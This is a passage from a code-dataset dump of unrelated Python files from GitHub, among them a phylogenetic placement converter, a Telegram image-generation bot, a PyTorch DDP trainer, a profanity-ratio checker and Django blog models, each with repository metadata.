n_inputs)\n    plot_bmu(dimension, best_matching_units, best_matching_units_result, n_inputs)\n    plot_umatrix(dimension, values, neuron_weights, n_inputs, values, answers)\n\n# main function\nif __name__ == \"__main__\":\n    # returning values and neuron_weights from the dataset function\n    # the neuron_weights is a 'square', with same length and width\n    # its depth is based on the amount of parameters on the input\n    values, answers, neuron_weights = dataset()\n\n    # calling the network processing\n    kohonen(values, answers, neuron_weights)","repo_name":"gucollaco/self-organized-map","sub_path":"som_network.py","file_name":"som_network.py","file_ext":"py","file_size_in_byte":14501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42237870515","text":"#SKC : Great Job! Should work great.\n#SKC : Functions should return their result so that others can use it. Consider that and return\n# rather than print the value inside the function, i.e. can u print the final result from outside the function.\n#Maanya: SKC, Something like this:\n\ndef seriessum(summer):\n\ttotalsum = 0\n\tfor i in range(1,summer + 1):\n\t\ttotalsum = totalsum + i\n\treturn totalsum\n\nsummer = int(input(\"Hello I am The Series Sum Bot. Enter a number which you would like me to sum for you today:\"))\nprint(seriessum(summer))\n","repo_name":"skoolofcode/SKoolOfCode","sub_path":"TrailBlazers/maanya/test/seriessummer.py","file_name":"seriessummer.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22475777524","text":"#! /usr/bin/env python\nimport json\nimport os,sys, re\nimport argparse\nimport pandas as pd\nimport random\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\nmy_usage = \"\"\"\nThis script was written to supplement Miguel's JPlace.to_iToL.rb script. It is meant to take a .jplace file produced by RAxML-EPA.\n\nThe idea is to make a good tree with long sequences, then map illumina OTUs onto the tree. This script will ID the OTUs that map to the nodes on the phylogenetic tree so you can inflate the OTUs back into counts.\n\nThe end goal is to use iToL (or ggtree) to annotate the reference tree with the relative abundance of reads associated with the nodes.\n\nIt takes as input (-i) a .jplace file, a counts file (-c), and an output (-o) file name.\n\nI've only tested this on one dataset. The OTUIDs are called denovo[0-9]+ and the BIOM table has the same row names. 
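A typical invocation, with hypothetical file names, might be: python jplace_otuids.py -i epa_result.jplace -c otu_counts.tsv -o itol_piechart.txt. 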
I use pandas to split the OTU table based on sequences that are associated with the same node.\n\"\"\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help=\".jplace file from raxml-epa\", required=True)\nparser.add_argument(\"-o\", \"--output\", help=\"output file name to store results\")\nparser.add_argument(\"-c\", \"--counts\", help=\"species counts table that is tab separated\")\n\nargs = parser.parse_args()\n\n# Delete output file if it already exists\ntry:\n    os.remove(args.output)\nexcept OSError:\n    pass\n\nwith open(args.input) as jplace:\n    json_obj = json.load(jplace)\n\nTree = json_obj['tree']\nTree = re.split(r\"\\(|\\)|,\", Tree)\nnode_names = []\nfor char in Tree:\n    if char:\n        m = re.match(\"(.*):[0-9]+\\.[0-9]+({[0-9]+})\", char)\n        if m:\n            node_names.append([m.group(2), m.group(1)])\n        else:\n            continue\n\n\nnode_dict = defaultdict(list)\nfor item in json_obj[\"placements\"]:\n    node_key = item['p'][0][0]\n    #print node_key\n    otu_value = item['n']\n    m = re.search('.*(denovo[0-9]+).*', str(otu_value))\n    node_dict[node_key].append(m.group(1))\n\n# Subsetting the OTU table and summarizing node results\notu_df = pd.read_table(args.counts, sep=\"\\t\", skiprows=(0), header=(1), index_col=(0))\n\nnew_df = pd.DataFrame(index = node_dict.keys(), columns = list(otu_df))\n#print otu_df[otu_df.index.isin(['denovo0', 'denovo11'])]\n\nfor node, otu in node_dict.iteritems():\n    line = \"{0}\\t{1}\\n\".format(node, otu)\n    #print otu\n    #print otu_df[otu_df.index.isin(otu)]\n    #print otu_df.sum()\n    new_df.loc[node] = otu_df[otu_df.index.isin(otu)].sum()\n\nnew_index_names = []\nfor index in new_df.index:\n    for nodeid in node_names:\n        newid = re.match(\"\\{([0-9]+)\\}\", nodeid[0])\n        if int(newid.group(1)) == int(index):\n            if nodeid[1]:\n                #new_df.index.rename = nodeid[1]\n                new_index_names.append(nodeid[1])\n            else:\n                new_index_names.append(\"{{{0}}}\".format(index))\n\n\nnew_df.index = new_index_names\nnew_df = new_df.assign(PiePlace=0.5)\nnew_df = new_df.assign(RowSum=new_df.sum(axis=1))\ncol_list = new_df.columns.tolist()\ncol_list = col_list[-2:] + col_list[:-2]\nnew_df = new_df[col_list]\n\n# format database for iTol\nf = open(args.output, 'a')\nf.write(\"DATASET_PIECHART\\n\")\nf.write(\"SEPARATOR TAB\\n\")\nf.write(\"DATASET_LABEL\\tReadPlacement\\n\")\nf.write(\"COLOR\\t#1f2122\\n\")\nf.write(\"FIELD_LABELS\\t\")\nf.write(\"\\t\".join(map(str, list(new_df)[2:])))\nf.write(\"\\n\")\nf.write(\"#I am being a bit lazy here, but I haven't spent the time to generate 'good' colors for the samples. I recommend using the website http://tools.medialab.sciences-po.fr/iwanthue/examples.php or http://phrogz.net/css/distinct-colors.html to get a list of colors that you like. 
They should be tab separated.\\n\")\nf.write(\"FIELD_COLORS\\n\")\nf.write(\"DATA\\n\")\nnew_df.to_csv(f, sep=\"\\t\", header = False)\nf.close()\n","repo_name":"waoverholt/waoverholt.github.io","sub_path":"assets/internal_files/jplace_otuids.py","file_name":"jplace_otuids.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25164085440","text":"import os\nimport sys\n\nimport requests\nimport base64\n\nfrom telegram.ext import Updater, MessageHandler, CommandHandler, Filters\nfrom telegram import InputMediaPhoto\nfrom translator.token import Token\nfrom translator import translate_api\nimport logging\n\n\nlogging.basicConfig(filename='logs/log.info', level='INFO')\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.StreamHandler(stream=sys.stdout))\n\nAPI_KEY = os.getenv('API_KEY')\n# The translation API token is initialized when the bot.py starts.\n# It will be renewed, when needed, in the translate_api.py module.\nIAM_TOKEN = Token()\nIAM_TOKEN = IAM_TOKEN.get_token()\n\n\ndef start(update, context):\n context.bot.send_message(\n chat_id=update.message.chat_id,\n text='Напиши словесное описание того, что хочешь видеть '\n 'нарисованным. Например, \"Ельцин носит латы\".')\n\n\ndef draw(update, context, token=IAM_TOKEN):\n \"\"\"Sends the query to Craiyon and fetches the images\"\"\"\n # Tell the user to be patient.\n context.bot.send_message(chat_id=update.message.chat_id,\n text='Подожди 1-2 минуты.',\n reply_to_message_id=update.message.message_id)\n prompt = update.message.text # The arguments come as a list, and we need a single string.\n log.info(f'The requested prompt is: {prompt}')\n # Send into translation API with the prompt text and initial IAM Token.\n try:\n translated = translate_api.translate(prompt, token)\n except PermissionError:\n token = Token()\n token = token.get_token()\n translated = translate_api.translate(prompt, token)\n log.info(f'It has been translated as: {translated}')\n # Request and response.\n response = requests.post('https://backend.craiyon.com/generate',\n # !!! Now it can respond with 'Too much traffic'. Gotta log the response.\n json={\"prompt\": translated})\n log.info(f\"Craiyon's response: {response}\")\n text = response.json()\n # Response comes as a dict with a list of b64-encoded images {'images':[]}.\n # Decode and send to the same chat. 
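Each list entry is assumed to be a base64-encoded image string;\n    # text.get('images', []) would be a more defensive lookup in case the\n    # service returns an error payload instead of images. 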
CrAIyon produces 9 images; decode them all and send them as a single media group.\n    chat_id = update.message.chat_id\n    media_group = []\n    for i in range(9):\n        image = base64.b64decode(text['images'][i])\n        media_unit = InputMediaPhoto(image)\n        media_group.append(media_unit)\n    context.bot.send_media_group(chat_id=chat_id, media=media_group)\n\n\ndef main():\n    updater = Updater(API_KEY)\n    dp = updater.dispatcher\n    dp.add_handler(CommandHandler('start', start))\n    dp.add_handler(MessageHandler(Filters.text, callback=draw))\n    updater.start_polling()\n    log.info(\"Bot started\")\n    updater.idle()\n    log.info(\"Bot stopped\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"BorisRouge/CraiyonBot-old-","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29082145757","text":"N, D = map(int,input().split())\r\n# N, D = map(int, \"7 3\".split())\r\n\r\nfor _ in range(N):\r\n    type, inpStr = map(str, input().split())\r\n    # type, inpStr = map(str, \"3 3.14150\".split())\r\n    if type == \"2\":\r\n        index = list(inpStr).index(\".\")+1\r\n        try:\r\n            # pad with zeros\r\n            if len(inpStr) < index + D:\r\n                inpStr += \"0\" * (index + D - len(inpStr))\r\n            print(inpStr[:index+D])\r\n        except:\r\n            # pad with zeros\r\n            if len(inpStr) < index + D:\r\n                inpStr += \"0\" * (index + D - len(inpStr))\r\n            print(inpStr)\r\n    elif type == \"1\":\r\n        inpStrList = list(inpStr)\r\n        index = inpStrList.index(\".\")+1\r\n        try:\r\n            res = float(inpStr[:index + D])  # truncated result\r\n            sishewuru = int(inpStrList[index+D])\r\n            if sishewuru >= 5:\r\n                jiawei = float(\"0.\"+\"0\"*index+\"1\")\r\n                res += jiawei\r\n            print(res)\r\n        except:\r\n            # pad with zeros\r\n            if len(inpStr) < index + D:\r\n                inpStr += \"0\" * (index + D - len(inpStr))\r\n            print(inpStr)\r\n\r\n    elif type == \"3\":\r\n        inpStrList = list(inpStr)\r\n        index = inpStrList.index(\".\") + 1\r\n        try:\r\n            sishewuru = int(inpStrList[index + D])\r\n            res = float(inpStr[:index + D])  # truncated result\r\n            if sishewuru > 5:\r\n                jiawei = float(\"0.\" + \"0\" * index + \"1\")\r\n                res += jiawei\r\n            elif sishewuru == 5:\r\n                sishewuruhou = int(inpStrList[index + D+1])\r\n                if sishewuruhou != None and sishewuruhou == 0:\r\n                    # round half to even: if the last kept digit is odd, round up; if it is even, truncate, so the last kept digit stays even\r\n                    houyiwei = int(inpStrList[index + D-1])\r\n                    if houyiwei%2 == 1:\r\n                        jiawei = float(\"0.\" + \"0\" * index + \"1\")\r\n                        res += jiawei\r\n                elif sishewuruhou != None and sishewuruhou != 0:\r\n                    jiawei = float(\"0.\" + \"0\" * index + \"1\")\r\n                    res += jiawei\r\n            print(res)\r\n        except:\r\n            # pad with zeros\r\n            if len(inpStr) < index+D:\r\n                inpStr += \"0\"*(index+D-len(inpStr))\r\n            print(inpStr)","repo_name":"freesan44/LeetCode","sub_path":"PTA_2020_3.py","file_name":"PTA_2020_3.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35724971709","text":"import re\nfrom string import punctuation\n\nTWEETS_FILE_PATH = 'tweets.txt'\nSLURS_FILE_PATH = 'slurs.txt'\n\ndef get_slurs_list(slurs_file_path: str) -> list:\n    \"\"\"\n    Reads the text file containing all slur words and converts it into a list\n\n    Parameters:\n    - slurs_file_path (str): Path of the slurs file to be read\n\n    Returns:\n    - A list of all slur words present in the text file\n    \"\"\"\n    slurs_list = []\n    with open(slurs_file_path, 'r') as sf:\n        for slur in sf.readlines():\n\n            # Remove all whitespace around the word\n            slur = slur.strip()\n\n            # Convert word to lowercase to avoid case-sensitivity-related issues\n            slur = slur.lower()\n\n            
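# Guard against blank lines in the slur file (an assumption about the\n            # input format): skip empties so they never enter the list.\n            if not slur:\n                continue\n\n            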
slurs_list.append(slur)\n\n    return slurs_list\n\nSLURS_LIST = get_slurs_list(SLURS_FILE_PATH)\n\ndef get_tweets_list(tweets_file_path: str) -> list:\n    \"\"\"\n    Reads the text file containing all tweets and returns them as raw strings.\n    Each raw tweet is later passed to the tokenize_raw_tweet function to get the tokens.\n\n    Parameters:\n    - tweets_file_path (str): Path of the tweets file to be read\n\n    Returns:\n    - A list of raw tweet strings\n    \"\"\"\n    tweets = []\n    with open(tweets_file_path, 'r') as f:\n        for raw_tweet in f:\n            tweets.append(raw_tweet)\n\n    return tweets\n\ndef tokenize_raw_tweet(raw_tweet: str) -> list:\n    \"\"\"\n    Clean and tokenize a single tweet\n\n    Parameters:\n    - raw_tweet (str): The tweet in string form to be tokenized\n\n    Returns:\n    - A list of tokens extracted from the tweet\n    \"\"\"\n\n    # Strip redundant whitespace around\n    raw_tweet = raw_tweet.strip()\n\n    # Remove punctuation\n    raw_tweet = raw_tweet.translate(str.maketrans('', '', punctuation))\n\n    # Split into tokens of lowercase words\n    tokens = raw_tweet.lower().split()\n\n    return tokens\n\n\ndef calculate_profanity_ratio(raw_tweet: str) -> float:\n    \"\"\"\n    Calculates the profanity ratio for a tweet after cleaning and tokenizing\n\n    Parameters:\n    - raw_tweet (str): A string representing a raw tweet\n\n    Returns:\n    - The profanity ratio for the tweet as a float between 0 and 1 (the share of tokens that are slurs)\n    \"\"\"\n\n    tokens = tokenize_raw_tweet(raw_tweet)\n\n    slur_count = 0\n    n = len(tokens)\n    if n == 0:\n        # avoid dividing by zero on blank lines\n        return 0.0\n\n    for word in tokens:\n        if word in SLURS_LIST:\n            slur_count += 1\n\n    return slur_count/n\n\ndef main():\n\n    tweets_list = get_tweets_list(TWEETS_FILE_PATH)\n\n    ratios = []\n\n    for tweet in tweets_list:\n        ratio = calculate_profanity_ratio(tweet)\n        ratios.append(ratio)\n\n\n    # Write the results to a new text file\n    with open('profanity_results.txt', 'w') as pf:\n        for ratio in ratios:\n            pf.write(f'{ratio:.2f}\\n')\n\nif __name__ == '__main__':\n    main()","repo_name":"prateekb1912/affinity-data-engineer-assignment","sub_path":"profanity_checker/profanity.py","file_name":"profanity.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6085612826","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom .DdpTrainerBase import DdpTrainerBase\n\n\nclass DdpTrainer(DdpTrainerBase):\n\n    class HookState:\n\n        def __init__(self, cref, process_group):\n            r\"\"\"\n            A class that holds state information that is needed by the communication hook\n            during the training algorithm.\n            Args:\n                cref (DdpTrainer): reference to the self keyword of the trainer instance\n                process_group (ProcessGroup): distributed process group\n            \"\"\"\n            self.cref = cref\n            self.process_group = process_group\n            self.batch_number = -1\n\n        def get_key(self, bucket_index):\n            r\"\"\"\n            A method that returns an encoded key that represents the current batch and\n            bucket index.\n            Args:\n                bucket_index (int): index of the bucket being processed in backward\n            \"\"\"\n            return f\"{self.batch_number},{bucket_index}\"\n\n        def next_batch(self):\n            r\"\"\"\n            A method that increments batch_number by 1.\n            \"\"\"\n            self.batch_number += 1\n\n    def __init__(self, rank, trainer_count, process_group, use_cuda_rpc, server_rref, backend, epochs):\n        r\"\"\"\n        A trainer that implements a DDP training algorithm using a simple hook that performs allreduce\n        using the process_group implementation.\n        Args:\n            rank (int): worker rank\n            
trainer_count (int): count of trainer in the world\n process_group (ProcessGroup): distributed process group\n use_cuda_rpc (bool): indicator for CUDA RPC\n server_rref (RRef): remote reference to the server\n backend (str): distributed communication backend\n epochs (int): epoch count for training\n \"\"\"\n super().__init__(rank)\n self.rank = rank\n self.trainer_count = trainer_count\n self.process_group = process_group\n self.use_cuda_rpc = use_cuda_rpc\n self.server_rref = server_rref\n self.backend = backend\n self.epochs = epochs\n\n @staticmethod\n def hook(state, bucket):\n r\"\"\"\n A ddp communication hook that uses the process_group allreduce implementation.\n Args:\n state (object): maintains state during the training process\n bucket (GradBucket): gradient bucket\n \"\"\"\n cref = state.cref\n tensors = [bucket.get_tensor() / state.process_group.size()]\n key = state.get_key(bucket.get_index())\n cref.record_hook_fut_start(key, f\"{cref.backend}_allreduce\")\n fut = state.process_group.allreduce(tensors).get_future()\n\n def callback(fut):\n cref.record_hook_fut_end(key)\n return fut.wait()\n\n return fut.then(callback)\n\n def get_hook(self):\n r\"\"\"\n returns DdpTrainer.hook\n \"\"\"\n return DdpTrainer.hook\n\n def create_ddp_model(self, model):\n r\"\"\"\n A method that creates a ddp_model and hook_state objects.\n It returns the ddp_model and hook_state objects.\n Args:\n model (nn.Module): neural network model\n \"\"\"\n ddp_model = DDP(\n model, device_ids=[self.rank], process_group=self.process_group\n )\n hook_state = self.HookState(self, self.process_group)\n ddp_model.register_comm_hook(hook_state, self.get_hook())\n return ddp_model, hook_state\n\n def create_criterion(self):\n r\"\"\"\n A method that creates a criterion for the training\n algorithm.\n \"\"\"\n return nn.CrossEntropyLoss().cuda(self.rank)\n\n def create_optimizer(self, parameters, lr):\n r\"\"\"\n A method that creates a optimizer for the training\n algorithm.\n Args:\n parameters (iterable): iterable of parameters to optimize\n lr (float): learning rate\n \"\"\"\n return torch.optim.SGD(parameters, lr)\n\n def epoch_key(self, epoch, index):\n r\"\"\"\n A method that returns an encoded key that represents the current epoch and\n iteration index.\n Args:\n epoch (int): epoch index\n index (int): iteration index\n \"\"\"\n return f\"{epoch},{index}\"\n\n def preprocess_data(self, data):\n r\"\"\"\n A method that moves the data from CPU to GPU.\n Args:\n data (list): training examples\n \"\"\"\n for i in range(len(data)):\n data[i][0] = data[i][0].cuda(self.rank)\n data[i][1] = data[i][1].cuda(self.rank)\n return data\n\n def iteration_step(self, ddp_model, criterion, optimizer, hook_state, epoch, index, batch):\n r\"\"\"\n A method that performs an iteration of training.\n Args:\n ddp_model (nn.Module): distributed data parallel model\n criterion (nn.Module): loss function to measure model\n optimizer (optim.Optimizer): updates model parameters\n hook_state (object): ddp communication hook state object\n epoch (int): index of pass through the data\n index (int): iteration number - 1 in current batch\n batch (list): training examples\n \"\"\"\n hook_state.next_batch()\n input, target = batch[0], batch[1]\n self.record_batch_start(self.epoch_key(epoch, index))\n optimizer.zero_grad()\n self.record_forward_start(self.epoch_key(epoch, index))\n out = ddp_model(input)\n self.record_forward_end(self.epoch_key(epoch, index))\n loss = criterion(out, target)\n 
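# loss.backward() below is what fires the registered communication hook:\n        # as each gradient bucket becomes ready, DDP invokes DdpTrainer.hook,\n        # which allreduces the bucket (pre-divided by the world size) through\n        # the process group.\n        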
self.record_backward_start(self.epoch_key(epoch, index))\n        loss.backward()\n        self.record_backward_end(self.epoch_key(epoch, index))\n        optimizer.step()\n        self.record_batch_end(self.epoch_key(epoch, index))\n\n    def train(self, model, data):\n        r\"\"\"\n        A method that implements the training algorithm.\n        Args:\n            model (nn.Module): neural network model\n            data (list): training examples\n        \"\"\"\n        model = model.cuda(self.rank)\n        data = self.preprocess_data(data)\n        ddp_model, hook_state = self.create_ddp_model(model)\n        criterion = self.create_criterion()\n        optimizer = self.create_optimizer(ddp_model.parameters(), 1e-4)\n\n        for epoch in range(self.epochs):\n            for index, batch in enumerate(data):\n                self.iteration_step(\n                    ddp_model, criterion, optimizer, hook_state, epoch, index, batch\n                )\n        torch.cuda.synchronize(self.rank)\n","repo_name":"xiaoqi25478/Job","sub_path":"PyTorch框架/pytorch-master/benchmarks/distributed/rpc/parameter_server/trainers/DdpTrainer.py","file_name":"DdpTrainer.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7365490690","text":"import collections.abc as abc\nfrom abc import ABC\n\n\nclass Noticia(ABC):\n    def __init__(self,tit,sub,fech,aut,cuer,com,cat):\n        self.titulo = tit\n        self.subtitulo = sub\n        self.fecha = fech\n        self.autor = aut\n        self.cuerpo = cuer\n        self.comentarios = com\n        self.categoria = cat\n\nclass Emol(Noticia):\n    def __init__(self,tit,sub,fech,aut,cuer,com,cat,subcat):\n        super().__init__(tit,sub,fech,aut,cuer,com,cat)\n        self.subcategoria = subcat\n\n\nclass La_Tercera(Noticia):\n    def __init__(self,tit,sub,fech,aut,cuer,com,cat):\n        super().__init__(tit,sub,fech,aut,cuer,com,cat)\n        # TODO: add Pulso, La Tercera Domingo, La Tercera PM\n","repo_name":"TheRaai/ProyectoLP","sub_path":"noticias.py","file_name":"noticias.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15194657609","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\ndef serve_layout():\n\n\treturn [\n\n\thtml.Br(),\n\thtml.Br(),\n\thtml.Br(),\n\n\t\tdbc.Row([\n\t\t\tdbc.Col('', width=2),\n\t\t\tdbc.Col(\n\t\t\t\thtml.Img(src='web-development2.png', style={ 'height': '300px'})\n\t\t\t, width=3),\n\n\n\t\t\tdbc.Col([\n\n\t\t\t\thtml.Br(),\n\n\t\t\t\thtml.Div('''QuantViews''', style={'font-size': 48, \n\t\t\t\t\t'font-weight': 'bold', 'color': '#2FC086'}),\n\n\t\t\t\thtml.Div('''Financial Apps for Smarter Investing''', style={'font-size': 24, \n\t\t\t\t\t'font-weight': 'bold', 'color': '#2FC086'}),\n\n\t\t\t\thtml.Div('''By Joey Bortfeld''', style={'font-size': 18, \n\t\t\t\t\t'font-weight': '', 'color': '#2FC086'}),\n\t\t\t])\n\t\t\t,\t\n\t\t]),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\thtml.Div('''In my day job I'm a \"quantitative analyst\" covering the corporate bond markets. \n\t\t\tWill Tesla be able to pay back the $10 billion in debt it has borrowed? 
What sectors are increasing their cash holdings?\n\t\t\tIs there a way to identify characteristics that are associated with outsized returns?''', \n\t\t\tstyle={'text-align': 'left', 'margin-left': '5%', 'font-size': 18}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\thtml.Div('''Now I want to make tools that are relevant for everyday people and that will help them\n\t\t\tnavigate their financial life.''', style={'text-align': 'left', 'margin-left': '5%', 'font-size': 18}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\t\n\t\thtml.Div('''Questions or suggestions? Please write me at quantviews@gmail.com''',\n\t\t\tstyle={'text-align': 'left', 'margin-left': '5%', 'font-size': 18, 'color': '#2FC086'}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\t\thtml.Div(\n\t\t\thtml.A('''This website and all its analysis is open-source. See here''', \n\t\t\thref='https://github.com/jbortfeld/QuantView')\n\t\t, style={'text-align': 'left', 'margin-left': '5%', 'font-size': 18, 'color': '#2FC086'}),\n\n\t\thtml.Br(),\n\t\thtml.Br(),\n\n\n\n\n\t]\n\nlayout=serve_layout","repo_name":"jbortfeld/QuantView","sub_path":"apps/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"73486114772","text":"import numpy as np\n\ndef get_column(table, header, col_name):\n index = header.index(col_name)\n new_table = []\n for row in table:\n new_table.append(row[index])\n return new_table\n\ndef get_frequencies (table, header, col_name):\n col = get_column(table,header,col_name)\n col.sort() # inplace_sort\n\n values = [] #75,76,77\n count = [] #2,1,1\n\n for value in col:\n if value not in values:\n values.append(value)\n count.append(1)\n else:\n count[-1] += 1\n\n return values,count\n \n\ndef main():\n header = [\"CarName\", \"ModelYear\", \"MSRP\"]\n msrp_table = [[\"ford pinto\", 75, 2769],\n [\"toyota corolla\", 75, 2711],\n [\"ford pinto\", 76, 3025],\n [\"toyota corolla\", 77, 2789]]\n msrps = get_column(msrp_table, header, \"MSRP\")\n print(msrps)\n\n modelyear_values, model_year_count = get_frequencies(msrp_table, header, \"ModelYear\")\n print(modelyear_values,model_year_count)\n\n\n msrp_mean = sum(msrps)/len(msrps)\n print(\"mean:\", msrp_mean)\n\n msrp_mid = (min(msrps)+max(msrps))/2\n print(\"mid:\", msrp_mid)\n\n squared_mean_deviations = [(msrp-msrp_mean) ** 2 for msrp in msrps]\n variance = sum(squared_mean_deviations)/len(squared_mean_deviations)\n standard_dev = variance ** (1/2)\n print(\"standar_dev:\", standard_dev)\n\n\n assert np.isclose(standard_dev,np.std(msrps))\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"dpmacisaac/HelloWorldPersonalGH","sub_path":"notes/main_data_prep.py","file_name":"main_data_prep.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25337689968","text":"import json\nfrom datetime import datetime\n\nfrom stats import get_user_session_stats\n\n\ndef lambda_handler(event, context):\n try:\n year = event[\"queryStringParameters\"][\"year\"]\n except Exception as ex:\n print(f\"Could not get year: {ex}\")\n year = datetime.now().year\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"content-type\": \"application/json\",\n \"Access-Control-Allow-Origin\": '*'\n },\n \"body\": json.dumps({\n \"data\": get_user_session_stats(year)\n }),\n 
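# NOTE: the wildcard Access-Control-Allow-Origin header above accepts any\n    # origin; convenient for testing, but worth restricting in production.\n    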
}\n","repo_name":"Lethabo-Kekana/chatbot-backend-system","sub_path":"src/GetSessionStats/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12404694516","text":"from django.db import models\nfrom django.core.validators import RegexValidator\nfrom django.core.exceptions import ValidationError\nfrom tinymce import models as tinymce_models\nfrom django.contrib.auth.base_user import BaseUserManager\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom django.utils.translation import ugettext_lazy\nfrom django.utils import timezone\nfrom django.contrib.auth.password_validation import validate_password\nfrom string import printable\n\n# Create your models here.\nclass Tag(models.Model):\n class Meta:\n verbose_name = 'برچسب'\n verbose_name_plural = 'برچسب ها'\n\n name = models.CharField(\n verbose_name='برچسب',\n max_length=100,\n )\n accept_by_admin = models.BooleanField(\n verbose_name='برچسب تایید شده است',\n default=False,\n )\n \n def __str__(self):\n return self.name\n\nclass Category(models.Model):\n class Meta:\n verbose_name = 'دسته بندی'\n verbose_name_plural = 'دسته بندی ها'\n\n name = models.CharField(\n verbose_name='دسته بندی',\n max_length=100,\n )\n\n supercategory = models.ForeignKey(\n 'Category',\n verbose_name='سر دسته',\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n )\n\n def __str__(self):\n return self.name\n\nclass Post(models.Model):\n class Meta:\n verbose_name = 'پست'\n verbose_name_plural = 'پست ها'\n permissions = [\n ('accept_post', 'تایید کردن پست'),\n ]\n\n title = models.CharField(\n verbose_name='عنوان',\n max_length=200,\n )\n text = tinymce_models.HTMLField(\n verbose_name='متن',\n )\n safe_text = models.TextField(\n verbose_name='متن بدون تگ html',\n )\n image = models.ImageField(\n verbose_name='تصویر پست',\n blank=True,\n null=True,\n upload_to='post_imgs'\n )\n show_post = models.BooleanField(\n verbose_name='نمایش عمومی پست',\n default=True,\n )\n post_send_time = models.DateTimeField(\n verbose_name='زمان ارسال پست',\n )\n accept_by_admin = models.BooleanField(\n verbose_name='پست تایید شده است',\n default=False,\n )\n tags = models.ManyToManyField(\n Tag,\n verbose_name='برچسب ها',\n through='Post_tag',\n )\n categories = models.ForeignKey(\n Category,\n on_delete=models.CASCADE,\n verbose_name='دسته بندی ها',\n )\n post_likes = models.ManyToManyField(\n 'User',\n verbose_name='پسندیدم',\n blank=True,\n related_name='post_like',\n through='Post_rating',\n )\n user = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n verbose_name='کاربر',\n related_name='post_user',\n )\n\n def __str__(self):\n return self.title\n\nclass Post_tag(models.Model):\n class Meta:\n verbose_name = 'برچسب پست'\n verbose_name_plural = 'برچسب های پست'\n\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n tag = models.ForeignKey('Tag', on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{self.post} : {self.tag}'\n\nclass Post_rating(models.Model):\n class Meta:\n verbose_name = 'پسندیدن/نپسندیدن پست'\n verbose_name_plural = 'پسندیدن/نپسندیدن پست ها'\n constraints = [\n models.UniqueConstraint(fields=['post','user'], name='postrates'),\n ]\n\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n user = models.ForeignKey('User', on_delete=models.CASCADE)\n positive = models.BooleanField(\n verbose_name='پسندیدن؟'\n )\n\n def __str__(self):\n if self.positive:\n return 
f'{self.user.username} ' + 'پسندید ' + 'پست ' + f'\"{self.post}\"'\n else:\n return f'{self.user.username} ' + 'نپسندید ' + 'پست ' + f'\"{self.post}\"'\n\nclass Comment(models.Model):\n class Meta:\n verbose_name = 'نظر'\n verbose_name_plural = 'نظرات'\n permissions = [\n ('accept_comment', 'تایید کردن نظر'),\n ]\n ordering = ['-comment_send_time']\n \n text = models.CharField(\n verbose_name='متن',\n max_length=500,\n )\n accept_by_admin = models.BooleanField(\n verbose_name='کامنت تایید شده است',\n default=False,\n )\n comment_send_time = models.DateTimeField(\n verbose_name='زمان ارسال نظر',\n )\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n verbose_name='پست',\n )\n user = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n verbose_name='کاربر',\n related_name='comment_user',\n )\n comment_likes = models.ManyToManyField(\n 'User',\n verbose_name='پسندیدم',\n blank=True,\n related_name='comment_like',\n through='Comment_rating',\n )\n\n def __str__(self):\n return str(self.text)[:50] + (len(self.text)>50)*'...'\n\nclass Comment_rating(models.Model):\n class Meta:\n verbose_name = 'پسندیدن/نپسندیدن نظر'\n verbose_name_plural = 'پسندیدن/نپسندیدن نظرات'\n constraints = [\n models.UniqueConstraint(fields=['comment','user'], name='commentrates'),\n ]\n\n comment = models.ForeignKey('Comment', on_delete=models.CASCADE)\n user = models.ForeignKey('User', on_delete=models.CASCADE)\n positive = models.BooleanField(\n verbose_name='پسندیدن؟'\n )\n\n def __str__(self):\n if self.positive:\n return f'{self.user.username} ' + 'پسندید ' + 'نظر ' + f'\"{self.comment}\"'\n else:\n return f'{self.user.username} ' + 'نپسندید ' + 'نظر ' + 